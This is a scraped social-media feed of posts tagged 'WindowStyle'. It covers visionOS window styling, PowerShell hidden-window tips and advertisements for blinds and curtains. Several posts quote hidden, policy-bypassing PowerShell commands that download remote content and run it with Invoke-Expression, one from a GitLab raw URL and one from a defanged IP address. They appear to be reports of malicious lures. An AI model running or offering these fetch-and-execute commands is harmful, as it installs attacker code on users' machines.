#WindowStyle
visionOS issue of the day.

Using .windowStyle(.plain) is ignored if the view hierarchy contains a NavigationStack

Feedback: FB17649580
May 19, 2025 at 5:03 PM
> powershell.exe -WindowStyle Hidden
> look inside
> visible for a split second
April 2, 2025 at 10:54 AM
Finally figured out how to make AutoHotKey call powershell scripts without making a making a powershell popup, brb going mad with power

(it's ``RunWait "powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File `"$YOUR_SCRIPT`"",, "Hide"``)
June 23, 2025 at 2:54 PM
-WindowStyle Hidden hides the console after it is created, not before — so it still flashes at sign-in. Fix: launch via wscript + .vbs.
https://telegra.ph/Hunting-the-Black-Window-That-Flashes-Right-After-Sign-in---WindowStyle-Hidden-Doesnt-Prevent-the-Window-It-Hides-It-Afterward-09-15
September 15, 2026 at 8:55 PM
`powershell.exe -WindowStyle hidden 😼.ps1`
June 3, 2025 at 9:51 PM
the radiuses (radii?) of window corners now get changed depending on what windowStyle they have. interesting.
June 9, 2025 at 9:30 PM
never before in my LIFE have i had a website ask me to run a fucking command? to visit the website? and automatically fill my clipboard with a powershell command? is this even fucking legal. text in image desc.
November 20, 2024 at 2:28 PM
-NoProfile -WindowStyle Hidden -Command "if (Test-Path '$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Teams.lnk') { Remove-Item '$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Teams.lnk' -Force }"
October 21, 2025 at 5:24 PM
😍A Venetian dream fitted perfectly into a beautiful home, where every corner whispers timeless elegance and every detail reflects a life styled with grace.🪟
#venetianblinds #windowstyle #homedecor #interiordesign #luxuryhomes #modernliving #blinds #windowinspo #homeinspiration #moonliteblinds
April 24, 2026 at 4:03 PM
Refresh your windows with our stylish vertical blinds ✨
Perfect for adding privacy, controlling natural light, and creating a clean, modern look in any room.
#VerticalBlinds #WindowBlinds #BlindsUK #HomeDecor #InteriorDesign #MadeToMeasure #ModernHomes #ElegantInteriors #HomeImprovement #WindowStyle
September 13, 2026 at 4:02 PM
or you can try this if the OS is applicable(check the alt text for code)
February 9, 2025 at 12:33 PM
the radiuses (radii?) of window corners now get changed depending on what windowStyle they have. interesting.
June 9, 2025 at 9:30 PM
Right click IE in your start menu > Open File Location > Right click the shortcut > properties > Shortcut > Set Target to `%systemroot%\System32\conhost.exe powershell.exe -noprofile -executionpolicy bypass -windowstyle hidden -command "(new-object -com internetexplorer.application).visible=$true"`
November 4, 2025 at 4:02 PM
112 Nanspring 52×84 White Linen Blend Curtain Panels – Light-Filtering Sheer Drapes (Set of 2)

Treasure Hunt Auction 🏡✨ On offer: a brand new Nanspring 52×84 White Linen Curtain Set — airy, elegant, and perfect for upgrading your space with soft light and texture. Whether your style is modern,…
112 Nanspring 52×84 White Linen Blend Curtain Panels – Light-Filtering Sheer Drapes (Set of 2)
Treasure Hunt Auction 🏡✨ On offer: a brand new Nanspring 52×84 White Linen Curtain Set — airy, elegant, and perfect for upgrading your space with soft light and texture. Whether your style is modern, farmhouse, or coastal, these drapes bring the calm vibes. 🌿🪟 #HomeDecor #LinenCurtains #WindowStyle #LightFiltering
wholesalebids.com
October 1, 2025 at 3:36 PM
PS command:

"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$hl = (Invoke-WebRequest -Uri 'https://gitlab.com/pnp30/svn/-/raw/main/deploy.md' -UseBasicParsing).Content; Invoke-Expression -Command $hl"
January 21, 2025 at 10:23 PM
i'd actually posit that redirecting on start-process is fundamentally different from stream redirection since that process is split off from the console (hence why there's windowstyle params etc.)
October 11, 2023 at 8:47 AM
🪟 Why are so many Brighton homes choosing shutters?
Style, privacy & light control – all made to measure and locally fitted.

Ever had shutters in your home? Would you?

🔗 New blog: www.brightonsunblinds.co.uk/why-brighton...

#ShuttersBrighton #MadeToMeasure #BrightonBusiness #WindowStyle
Shutters Brighton: Why More Homes Are Choosing Them
Shutters Brighton – Made-to-measure wooden shutters fitted by local experts. Stylish, private, and built to last. Get your free quote today.
www.brightonsunblinds.co.uk
March 31, 2025 at 10:03 AM
S2 MicrosoftConsole; powershell.exe -NoProfile -WindowStyle Hidden -Command "irm 'hxxp://41.216.188[.]215/update' | iex" [X]
December 31, 2025 at 12:58 AM